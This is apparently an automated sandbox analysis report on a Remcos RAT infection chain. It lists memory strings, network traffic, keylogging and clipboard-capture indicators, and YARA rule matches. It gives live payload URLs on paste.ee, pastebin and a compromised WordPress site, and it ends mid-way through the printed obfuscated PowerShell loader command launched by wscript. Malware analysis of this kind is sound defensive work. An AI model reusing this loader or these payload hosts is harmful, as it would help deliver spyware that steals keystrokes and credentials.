                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.2324128930.000001BDAE320000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB0F0F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000004.00000002.3083725979.000001BDC8340000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.microsoft.co
                    Source: powershell.exe, 00000006.00000002.2889045925.000001C1774C3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ion=v4.5
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB04D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0502000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee/d/Ga0HE/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee/d/RdlsG/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee/d/RdlsG/0P
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee/d/b5xuX/0
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1932000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://paste.ee/d/b5xuX/0P
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D7F6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 0000000D.00000002.2750883006.000001EB653E9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/GAC
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D61F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gratitudeseekers.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gratitudeseekers.com/wp-includes/customize/c
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025101D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3114097341.0000025100248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3114097341.0000025100510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknown; Network traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknown; Network traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 173.231.247.100:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 20_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000,20_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 20_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 20_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,20_2_0040A41B
                    Source: Yara match; File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match; File source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara match; File source: C:\ProgramData\1210\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 20_2_0041CA73 SystemParametersInfoW,20_2_0041CA73

                    System Summary

Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 6764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + 